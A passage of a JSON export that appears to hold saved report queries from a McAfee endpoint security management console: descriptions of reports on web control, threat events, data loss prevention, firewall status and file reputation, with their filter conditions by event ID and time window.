days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 red sites that were blocked over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites that were warned-continued over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites that were blocked over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites blocked because of Block List policy over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites allowed because of Allow List policy over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Detailed event log of site navigation activity over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Bar chart depicting number of downloads over the last 30 days, grouped by policy-based action.\\\",\\r\\n\\t\\t\\t\\\"Detailed event log of download activity over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 red sites allowed because of Allow List policy over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top sites grouped by content over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 sites that were warned-cancelled over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Bar chart depicting number of visits over the last 30 days, grouped by policy-based action.\\\",\\r\\n\\t\\t\\t\\\"Top 100 red downloads over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 yellow downloads over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Top 100 unrated downloads over the last 30 days.\\\",\\r\\n\\t\\t\\t\\\"Bar chart depicting number of visits to each content category over the last 30 days, grouped by policy-based action.\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Block Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Allow Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Clean Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Block Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Allow Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Clean Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Block Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Allow Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Clean Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Displays a table of all failed actions within the last 30 days from the Audit Log.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of incidents (data in-use/in-motion) per type\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of incidents (data in-use/in-motion) per rule set\\\",\\r\\n\\t\\t\\t\\\"This is a stacked bar chart of multiple modules and their installation status\\\",\\r\\n\\t\\t\\t\\\"The number of threat events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"The number of threat events in the last seven days.\\\",\\r\\n\\t\\t\\t\\\"Summary of threats that have been detected in the last 24 hours.\\\",\\r\\n\\t\\t\\t\\\"Summary of threats that have been detected in the last seven days.\\\",\\r\\n\\t\\t\\t\\\"This report lists the Primary Vectors of Attack in the last 7 days.\\\",\\r\\n\\t\\t\\t\\\"This report lists the Top Infected Users in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"This report lists the Top Threats in the Last 48 Hours\\\",\\r\\n\\t\\t\\t\\\"This report lists the Duration before Detection on Endpoints in the Last 2 Weeks\\\",\\r\\n\\t\\t\\t\\\"This report lists the top 10 attacking systems in the last 7 days\\\",\\r\\n\\t\\t\\t\\\"This report lists the technologies that are currently enabled on each system\\\",\\r\\n\\t\\t\\t\\\"This is the Self Protection Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"Displays two lists of computers which do and do not have the latest policies applied.\\\",\\r\\n\\t\\t\\t\\\"Displays a boolean pie chart showing which policies have and have not been updated on the clients.\\\",\\r\\n\\t\\t\\t\\\"Displays the hotfixes installed for Endpoint Security Platform.\\\",\\r\\n\\t\\t\\t\\\"This report lists the Applications with the Most Exploits in the Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"This report lists the Duration of Completed Full Scans in the last 7 days\\\",\\r\\n\\t\\t\\t\\\"This report lists the Duration of Completed Quick Scans in the last 7 days\\\",\\r\\n\\t\\t\\t\\\"This report lists the number of systems that have not completed a Full Scan in the last 7 days but within the last month\\\",\\r\\n\\t\\t\\t\\\"This report lists the number of systems that have not completed a Full Scan in the last month\\\",\\r\\n\\t\\t\\t\\\"This is the Access Protection Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"This is the AMCore Content Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"This is the Exploit Prevention Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"This is the On-Access Scan Compliance Status Report.\\\",\\r\\n\\t\\t\\t\\\"This is the Content Status Report for Threat Prevention.\\\",\\r\\n\\t\\t\\t\\\"This is the Content Status Report for the Exploit Prevention feature.\\\",\\r\\n\\t\\t\\t\\\"Displays the number of threats on which an action was taken (cleaned, deleted) versus the number of threats on which no action was taken, in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the threats detected over the previous two quarters. No cookies.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten computers with the most detections in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten detected threats in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten most frequently broken access protection rules in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Slice count is the number of events. Slices are the different event severities. All in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Top 10 user with the most detections in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten threats per threat category over the last three months. Grouped by threat category, then threat name.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten computers which are the source of a threat in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the top ten exploits prevented in the last three months.\\\",\\r\\n\\t\\t\\t\\\"Displays the hotfixes installed for Threat Prevention.\\\",\\r\\n\\t\\t\\t\\\"This reports displays the McAfee GTI sensitivity level for On-Access Scans.\\\",\\r\\n\\t\\t\\t\\\"This reports displays the McAfee GTI sensitivity level for On-Demand Full Scans.\\\",\\r\\n\\t\\t\\t\\\"This reports displays the McAfee GTI sensitivity level for On-Demand Quick Scans.\\\",\\r\\n\\t\\t\\t\\\"This reports displays the McAfee GTI sensitivity level for Right-Click Scans.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the Distribution of DLP products on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the current status of Local Email Storage endpoint scans\\\",\\r\\n\\t\\t\\t\\\"This report summarizes policy distribution\\\",\\r\\n\\t\\t\\t\\\"This report summarizes enforced Rule Sets per endpoint computer\\\",\\r\\n\\t\\t\\t\\\"This report lists Bypassed users\\\",\\r\\n\\t\\t\\t\\\"The number of intrusion events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"The number of firewall events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall: Displays events generated by system within McAfee GTI in the last 6 months.\\\",\\r\\n\\t\\t\\t\\\"The number of traffic block events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security Firewall Status\\\",\\r\\n\\t\\t\\t\\\"Displays where Firewall protection is enabled or disabled on managed systems.\\\",\\r\\n\\t\\t\\t\\\"Displays the number of Firewall client rules created over time.\\\",\\r\\n\\t\\t\\t\\\"Displays firewall client rules listed by process and port range.\\\",\\r\\n\\t\\t\\t\\\"Displays firewall client rules listed by process and user.\\\",\\r\\n\\t\\t\\t\\\"Displays firewall client rules listed by process.\\\",\\r\\n\\t\\t\\t\\\"Displays firewall client rules listed by protocol and system name.\\\",\\r\\n\\t\\t\\t\\\"Displays managed systems where the Firewall feature is enabled by policy but didn't start successfully.\\\",\\r\\n\\t\\t\\t\\\"Displays the hotfixes installed for Firewall.\\\",\\r\\n\\t\\t\\t\\\"Summarize how many cleanup executions deleted items.\\\",\\r\\n\\t\\t\\t\\\"Summary of the number of items deleted by week during cleanup executions.\\\",\\r\\n\\t\\t\\t\\\"Find suspicious most used files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most recently used suspicious files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent suspicious files created from last month.\\\",\\r\\n\\t\\t\\t\\\"Find monitored files most used from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most recently used monitored files from last month.\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Block Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Allow Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Clean Events by Event Type\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Block Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Block Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Allow Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Allow Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Clean Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Clean Events by Rule (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Events by System (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Events by System (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Events by File (Top 10)\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Events by File (Top 10)\\\",\\r\\n\\t\\t\\t\\\"False Positive Mitigation Events for the last 30 days\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent monitored files created from last month.\\\",\\r\\n\\t\\t\\t\\\"Find used ATD submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by DXL connectivity.\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by TIE server version.\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by agent version.\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by TIE platform version.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the current status of Local File System endpoint scans\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest status of Local File System endpoint scans\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local File System endpoint scans sensitive files\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local File System endpoint scans errors\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local File System endpoint scans classifications\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest status of Local Email endpoint scans\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local Email endpoint scans sensitive files\\\",\\r\\n\\t\\t\\t\\\"This report summarizes privileged users\\\",\\r\\n\\t\\t\\t\\\"This report summarizes Chrome support\\\",\\r\\n\\t\\t\\t\\\"Find all certificates created last week and aggregate by reputation.\\\",\\r\\n\\t\\t\\t\\\"Find all Malicious or Unidentified Certificates by GTI Reputation from Last Month.\\\",\\r\\n\\t\\t\\t\\\"Find all certificates and aggregate by enterprise reputation.\\\",\\r\\n\\t\\t\\t\\\"Find used CTD submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Lists the failed client interface logon attempts by user for all managed systems.\\\",\\r\\n\\t\\t\\t\\\"Lists locked client systems due to multiple failed password attempts.\\\",\\r\\n\\t\\t\\t\\\"This query displays computers which successfully installed the MCP Endpoint or failed installing the MCP Endpoint in the last month\\\",\\r\\n\\t\\t\\t\\\"Find TIE appliances split by DXL broker version.\\\",\\r\\n\\t\\t\\t\\\"Find used overridden files from last month.\\\",\\r\\n\\t\\t\\t\\\"The number of firewall events in the last twenty-four hours.\\\",\\r\\n\\t\\t\\t\\\"Security Incidents in last 14 days\\\",\\r\\n\\t\\t\\t\\\"OS Distribution for VMs discovered by McAfee Data Center\\\",\\r\\n\\t\\t\\t\\\"All registered Data Centers\\\",\\r\\n\\t\\t\\t\\\"Application Reputation\\\",\\r\\n\\t\\t\\t\\\"Anti-Malware Status\\\",\\r\\n\\t\\t\\t\\\"Host Firewall Status\\\",\\r\\n\\t\\t\\t\\\"File Integrity Monitoring Status\\\",\\r\\n\\t\\t\\t\\\"Boot Attestation Status of all ESX Hypervisors in the Data Center\\\",\\r\\n\\t\\t\\t\\\"AV protection by product\\\",\\r\\n\\t\\t\\t\\\"Specifies the protection status of the endpoints.\\\",\\r\\n\\t\\t\\t\\\"Specifies the last scan details of the endpoints.\\\",\\r\\n\\t\\t\\t\\\"Security Incidents in last 14 days\\\",\\r\\n\\t\\t\\t\\\"OS Distribution for VMs discovered by McAfee Data Center\\\",\\r\\n\\t\\t\\t\\\"All registered Data Centers\\\",\\r\\n\\t\\t\\t\\\"Anti-Malware Status\\\",\\r\\n\\t\\t\\t\\\"File Integrity Monitoring Status\\\",\\r\\n\\t\\t\\t\\\"Instance assessment based on Agentless Firewall\\\",\\r\\n\\t\\t\\t\\\"Host Firewall Status\\\",\\r\\n\\t\\t\\t\\\"Specifies the protection status of vSphere endpoints\\\",\\r\\n\\t\\t\\t\\\"Find refreshed files from last month.\\\",\\r\\n\\t\\t\\t\\\"Shows database size from last month.\\\",\\r\\n\\t\\t\\t\\\"Find new files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find new overrides from last month.\\\",\\r\\n\\t\\t\\t\\\"Find ATD submissions split by reputation.\\\",\\r\\n\\t\\t\\t\\\"Find ATD sample submissions during last month.\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent ATD submissions.\\\",\\r\\n\\t\\t\\t\\\"Find new ATD submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Find CTD submissions split by reputation.\\\",\\r\\n\\t\\t\\t\\\"Find CTD sample submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent CTD submissions.\\\",\\r\\n\\t\\t\\t\\\"Find new CTD submissions from last month.\\\",\\r\\n\\t\\t\\t\\\"Find trusted file overrides having similar GTI reputation.\\\",\\r\\n\\t\\t\\t\\\"Find suspicious file overrides having similar GTI reputation.\\\",\\r\\n\\t\\t\\t\\\"Find suspicious file overrides with conflicting GTI reputation.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of operational events per day\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the DLP client version installed on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"Find trusted file overrides with conflicting GTI reputation.\\\",\\r\\n\\t\\t\\t\\\"Find unknown files that are not signed from last month.\\\",\\r\\n\\t\\t\\t\\\"Find unsigned unknown files per composite reputation and group them by their first and last access.\\\",\\r\\n\\t\\t\\t\\\"Find Unsigned Unknown Files by company from last month.\\\",\\r\\n\\t\\t\\t\\\"Find the most active parent Files of Unknown Files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find the 10 most monitored Unknown Files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find the 10 systems that reported the largest number of New Files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find signed unknown files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find files split by certificate subject and SHA-1.\\\",\\r\\n\\t\\t\\t\\\"Find signed Unknown Files by company from last month.\\\",\\r\\n\\t\\t\\t\\\"Find signed Unknown Files by product from last month.\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the DLP client status on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the DLP client operational mode on endpoint computers\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the number of DLP operational events per type\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of incidents (data in-use/in-motion) per day\\\",\\r\\n\\t\\t\\t\\\"This report summarizes number of incidents (data in-use/in-motion) per severity\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local Email endpoint scans errors\\\",\\r\\n\\t\\t\\t\\\"This report summarizes the latest Local Email endpoint scans classifications\\\",\\r\\n\\t\\t\\t\\\"This report summarizes undefined device classes for windows devices only\\\",\\r\\n\\t\\t\\t\\\"This report summarizes policy revision distribution\\\",\\r\\n\\t\\t\\t\\\"This report displays unsupported Chrome versions\\\",\\r\\n\\t\\t\\t\\\"Find all certificates where the GTI reputation changed last week.\\\",\\r\\n\\t\\t\\t\\\"Find top 10 systems with new certificates last week.\\\",\\r\\n\\t\\t\\t\\\"Find all files created last week and aggregate by reputation.\\\",\\r\\n\\t\\t\\t\\\"Find all Malicious or Unidentified Files by GTI Reputation from Last Month.\\\",\\r\\n\\t\\t\\t\\\"Find all files and aggregate by enterprise reputation.\\\",\\r\\n\\t\\t\\t\\\"Find all files where the GTI reputation changed last week.\\\",\\r\\n\\t\\t\\t\\\"Find top 10 systems with new files last week.\\\",\\r\\n\\t\\t\\t\\\"Show cleanup trending summary.\\\",\\r\\n\\t\\t\\t\\\"Display the number of executions that delete items versus those that don't delete items.\\\",\\r\\n\\t\\t\\t\\\"Find malicious files by composite reputation from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most recent malicious files from last month.\\\",\\r\\n\\t\\t\\t\\\"Find most prevalent malicious files created from last month.\\\",\\r\\n\\t\\t\\t\\\"Provides McAfee product usage report.\\\",\\r\\n\\t\\t\\t\\\"The number data protected v/s unprotected volumes attached to per VM.\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Real Protect Detection Events in Last 24 Hours\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Real Protect Detection Events for Last 7 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Real Protect Detection Events for Last 30 Days\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Observation Real Protect Detection Events for Last Quarter\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Content Status\\\",\\r\\n\\t\\t\\t\\\"Adaptive Threat Protection Extra.DAT Signature Names\\\"\\r\\n\\t\\t]\"",
    "conditionSexp": "\"[\\r\\n\\t\\t\\t\\\"Permission Does not equal \\\\\\\"%%NOEPOROLES%%\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Success Equals False and Start Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational)\\\",\\r\\n\\t\\t\\t\\\"Managed State Equals Managed\\\",\\r\\n\\t\\t\\t\\\"System Name Is duplicated \\\",\\r\\n\\t\\t\\t\\\"Last Communication Is within the last 1 Days\\\",\\r\\n\\t\\t\\t\\\"(Query Used to Generate Compliance Event Equals \\\\\\\"McAfee Agent Compliance Summary\\\\\\\" and Compliance Check Time Is within the last 1 Years)\\\",\\r\\n\\t\\t\\t\\\"Last Communication Is within the last 2 Weeks\\\",\\r\\n\\t\\t\\t\\\"(Query Used to Generate Compliance Event Equals \\\\\\\"McAfee Agent Compliance Summary\\\\\\\" and Compliance Check Time Is within the last 1 Years)\\\",\\r\\n\\t\\t\\t\\\"(Action Equals \\\\\\\"Repository Replication\\\\\\\" and Completion Time Is within the last 2 Months)\\\",\\r\\n\\t\\t\\t\\\"(Action Equals \\\\\\\"Logon attempt\\\\\\\" and Success Equals False and Start Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Completion Time Is within the last 1 Months and Action Equals \\\\\\\"Logon attempt\\\\\\\" and Success Equals True)\\\",\\r\\n\\t\\t\\t\\\"((Action Equals \\\\\\\"Add Agent Handler Assignment Rule\\\\\\\" or Action Equals \\\\\\\"Add License Key\\\\\\\" or Action Equals \\\\\\\"Backup Keystore\\\\\\\" or Action Equals \\\\\\\"Change Password\\\\\\\" or Action Equals \\\\\\\"Change Registered Server\\\\\\\" or Action Equals \\\\\\\"Create Key\\\\\\\" or Action Equals \\\\\\\"Delete Agent Handler Assignment Rule\\\\\\\" or Action Equals \\\\\\\"Delete Key\\\\\\\" or Action Equals \\\\\\\"Delete Server\\\\\\\" or Action Equals \\\\\\\"Download Keystore File\\\\\\\" or Action Equals \\\\\\\"Edit Agent Handler Assignment Rule\\\\\\\" or Action Equals \\\\\\\"Edit event filtering settings\\\\\\\" or Action Equals \\\\\\\"Export Agent Handler Rule\\\\\\\" or Action Equals \\\\\\\"Export Key\\\\\\\" or Action Equals \\\\\\\"Export Public Key\\\\\\\" or Action Equals \\\\\\\"Import Agent Handler Rule\\\\\\\" or Action Equals \\\\\\\"Import Key\\\\\\\" or Action Equals \\\\\\\"Modify server ports\\\\\\\" or Action Equals \\\\\\\"New Server\\\\\\\" or Action Equals \\\\\\\"Restore Keystore\\\\\\\" or Action Equals \\\\\\\"Set master key\\\\\\\" or Action Equals \\\\\\\"Update Server Certificate\\\\\\\") and Completion Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"((Action Equals \\\\\\\"Upload Extension\\\\\\\" or Action Equals \\\\\\\"Uninstall Extension\\\\\\\" or Action Equals \\\\\\\"Install Extension\\\\\\\" or Action Equals \\\\\\\"Check-in package\\\\\\\" or Action Equals \\\\\\\"Delete package\\\\\\\" or Action Equals \\\\\\\"Repository Pull\\\\\\\" or Action Equals \\\\\\\"Add repository\\\\\\\" or Action Equals \\\\\\\"Edit repository\\\\\\\" or Action Equals \\\\\\\"Delete repository\\\\\\\" or Action Equals \\\\\\\"Repository Replication\\\\\\\" or Action Equals \\\\\\\"Change credentials\\\\\\\" or Action Equals \\\\\\\"Import repository\\\\\\\" or Action Equals \\\\\\\"Check in software package\\\\\\\" or Action Equals \\\\\\\"Delete Software Package\\\\\\\") and Completion Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"((Action Equals \\\\\\\"Backup Keystore\\\\\\\" or Action Equals \\\\\\\"Export Key\\\\\\\" or Action Equals \\\\\\\"Import Key\\\\\\\" or Action Equals \\\\\\\"Add Permission Set\\\\\\\" or Action Equals \\\\\\\"Duplicate Permission Set\\\\\\\" or Action Equals \\\\\\\"Modify Permission Set\\\\\\\" or Action Equals \\\\\\\"New User\\\\\\\" or Action Equals \\\\\\\"Update User\\\\\\\" or Action Equals \\\\\\\"Change Password\\\\\\\" or Action Equals \\\\\\\"Remove User\\\\\\\" or Action Equals \\\\\\\"Change Permission Sets for User\\\\\\\" or Action Equals \\\\\\\"Purge Audit Log\\\\\\\" or Action Equals \\\\\\\"Purge Threat Event Log\\\\\\\") and Start Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event Category Belongs to Malware and Event Generated Time Is within the last 1 Quarters)\\\",\\r\\n\\t\\t\\t\\\"Product Equals McAfee Agent \\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"((Action Equals \\\\\\\"Assign policy\\\\\\\" or Action Equals \\\\\\\"Remove policy assignment\\\\\\\" or Action Equals \\\\\\\"Add policy assignment rule\\\\\\\" or Action Equals \\\\\\\"Delete policy assignment rule\\\\\\\" or Action Equals \\\\\\\"Edit policy assignment rule\\\\\\\" or Action Equals \\\\\\\"Edit Policy Assignment Rule Priority\\\\\\\") and Start Time Is within the last 1 Months and User Name Does not equal \\\\\\\"system\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Sequence Errors Greater than 25 \\\",\\r\\n\\t\\t\\t\\\"(Last Sequence Error Is not within the last 1 Weeks and Sequence Errors Greater than 0 )\\\",\\r\\n\\t\\t\\t\\\"Managed State Equals Unmanaged\\\",\\r\\n\\t\\t\\t\\\"((Status Equals Failed or Status Equals ?) and Name Starts with \\\\\\\"Check In Components\\\\\\\" and Source Equals Software Catalog)\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"((Event ID Equals 2411 or Event ID Equals 2412 ) and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 2413 and Event Generated Time Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 2412 and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 2402 and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"((Event ID Equals 2401 or Event ID Equals 2402 ) and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"Type Equals Distributed\\\",\\r\\n\\t\\t\\t\\\"(Action Equals \\\\\\\"New system\\\\\\\" and Completion Time Is before now)\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Event Category Does not belong to Operational\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 2402 , 2401 and Event Generated Time Is within the last 2 Months)\\\",\\r\\n\\t\\t\\t\\\"(Last Communication Is not within the last 1 Months and Managed State Equals Managed)\\\",\\r\\n\\t\\t\\t\\\"Managed State Equals Managed\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event Category Does not belong to Operational and Event Received Time Is within the last 2 Weeks)\\\",\\r\\n\\t\\t\\t\\\"(Policy Enforcement Status Equals 0 and Event ID Equals 2422 )\\\",\\r\\n\\t\\t\\t\\\"(Property Collection Status Equals 0 and Event ID Equals 2427 )\\\",\\r\\n\\t\\t\\t\\\"(Event Type Equals \\\\\\\"DAT\\\\\\\" or Event Type Equals \\\\\\\"Engine\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"((Event Type Does not equal \\\\\\\"Plugin\\\\\\\" and Event Type Does not equal \\\\\\\"Uninstall\\\\\\\") and Error Code Equals Deployment/Update Successful and Site Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"Web Control Hotfixes Value is not blank \\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Event ID Equals 18600 and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and System Name Value is not blank and (Action Equals Allowed or Action Equals Warned-continued or Action Equals Invoked On-Demand Scan))\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Rating Equals Red and (Action Equals Allowed or Action Equals Warned-continued) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Rating Equals Yellow and (Action Equals Allowed or Action Equals Warned-continued) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Rating Equals Unknown rating type and (Action Equals Allowed or Action Equals Warned-continued) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Action Equals Blocked and Rating Equals Red and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Event ID Equals 18600 and Action Equals Warned-continued and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Action Equals Blocked and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Reason Equals On a list and List Type Equals Prohibited and Action Equals Blocked and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Reason Equals On a list and List Type Equals Authorized and (Action Equals Allowed or Action Equals Warned-continued) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and Rating Equals Red and (Action Equals Allowed or Action Equals Warned-continued) and Reason Equals On a list and List Type Equals Authorized and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Event ID Equals 18600 and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Action Equals Warned-cancelled and Event ID Equals 18600 and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18600 and Event Generated Time Is within the last 1 Months and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and Rating Equals Red and (Action Equals Allowed or Action Equals Warned-continued or Action Equals Invoked On-Demand Scan) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and Rating Equals Yellow and (Action Equals Allowed or Action Equals Warned-continued or Action Equals Invoked On-Demand Scan) and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 18601 and Event Generated Time Is within the last 1 Months and Rating Equals Unknown rating type and (Action Equals Allowed or Action Equals Warned-continued or Action Equals Invoked On-Demand Scan) and 